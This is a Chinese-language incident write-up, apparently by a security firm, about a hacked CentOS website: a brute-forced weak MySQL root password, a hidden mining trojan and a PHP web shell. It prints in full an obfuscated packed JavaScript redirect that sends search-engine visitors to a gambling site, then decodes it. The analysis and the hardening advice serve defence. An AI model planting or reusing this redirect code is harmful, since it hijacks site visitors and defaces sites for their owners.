eSafe白帽駭客資安網-網絡安全背後的巨人,提供駭客,網站入侵測試,網站被駭,網站漏洞,駭客入侵,資訊安全,入侵,ecshop,wordpress,漏洞修復,木馬清除,資安服務

網站被駭、被入侵該如何解決?


 
         近日某客戶網站被駭,導致網站首頁被篡改並跳轉到賭博網站,網站在百度的
收錄也收錄

了一些什麼彩票內容的快照,網站首頁快照也被修改成賭博內容,並被
百度直接紅色風險攔截提

示,百度網址安全中心提醒您:該站點可能受到駭客攻擊
,部分頁面已被非法篡改!我們esafe安

全公司根據以上客戶被黑的情況,立即進行
了全面的網站安全檢測,針對網站被駭的情況制定了

詳細的安全部署方案。

 
 
首先客戶網站使用的是Linux centos系統主機,客戶提供主機ip,ssh端口,root賬號密碼後

,我們進去查看了主機是否存在被黑以及系統木馬後門的情況,
再一個我們對其使用的

mysql數據庫進行了安全檢測,發現問題,該mysql數據庫的
root賬號使用的是弱口令密碼,導

致攻擊者可以利用軟件對數據庫進行強力破解,
導致破解成功,利用root權限直接提權並上傳

腳本木馬到網站的根目錄下。
 
 
根據上面發現的數據庫安全問題,我們深度挖掘,追蹤溯源,發現主機還存在木馬後門,

top,查看linux當前進程,發現一個可疑的進程,通過查看進程的詳細信
息我們發現該進程是木

馬後門進程,再仔細一檢查發現該木馬是挖礦木馬,攻擊者
利用主機資源,帶寬,進行挖礦,

像比特幣、以太坊等幣進行挖礦。

 
 
我們對其挖礦木馬進行安全分析:如下圖


 
解密木馬內容,我們發現該木馬目前來說是免殺的木馬,一般人是看不出問題來,但是經常維護

主機的運維人員就會察覺出來,第一該木馬隱藏到linux進程當中
去,根據時間段進行挖礦,避

開高峰時間,以及維護人員的工作時間,當挖礦的時
候木馬進程CPU佔用達到百分之80以上,甚

至有時候網站都打開很慢。

 
主機的木馬查完後,我們對網站的源代碼進行安全檢測,發現網站目錄裡被上傳了網站木馬

後門,php腳本木馬,該腳本木馬可以對網站進行讀寫新建等操作,網
站的首頁標題描述也被

改成了什麼賭博的內容如下圖:

 
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e
 
(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString
 
(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=
 
[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)
 
if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}
 
('3.4("<5 c=\\"b\\">");3.4("d 1=3.f");3.4("e(1.2(\\"7\\")>0 || 1.2(\
 
\"6\\")>0 || 1.2(\\"8\\")>0 ||1.2(\\"a\\")>0 ||1.2(\\"9\\")>0 ||1.2(\
 
\"l\\")>0 ||1.2(\\"m\\")>0 ||1.2(\\"k\\")>0 )");3.4("h.g=\\"j://i.o.n\
 
\";");3.4("</5>");',25,25,'|s|indexOf|document|writeln|script|sogou|
 
baidu|soso|uc|sm|Javascript|LANGUAGE|var|if|referrer|href|location|www|
 
http|so|bing|yahoo|com|268238'.split('|'),0,{}))
</script>
 
通過解密上面的代碼發現,只要是從百度,搜狗,以及soso,so,bing等搜索引擎來的訪問,都會

直接跳轉到攻擊者設定好的賭博網站上去。隨即我們eSafe白帽資安網公司
對該惡意代碼進行了清除,網

站恢復正常訪問。
 
 
以上就是我們解決客戶網站安全的整個過程,下面針對於此次網站被駭,提供如下的網站安全建議:
 
 
1.對mysql數據庫進行安全部署,對root賬號密碼加密,盡可能設置的複雜一些,數字+大小寫

字母+特殊符號,對網站數據庫進行分配普通權限賬號。
 
2.mysql數據庫默認端口3306,改為51158,並加入到端口安全策略,不對外開放,外網IP無法

連接數據庫,只有本地127.0.0.1才能進行連接數據庫,以防止攻擊者
惡意猜測。
 
3.對主機底層系統進行安全加固,包括SSH登錄的安全驗證。
 
4.對網站代碼進行整體的安全檢測,包括定期的升級網站程序源代碼,修復補丁以及網站漏洞。
分享: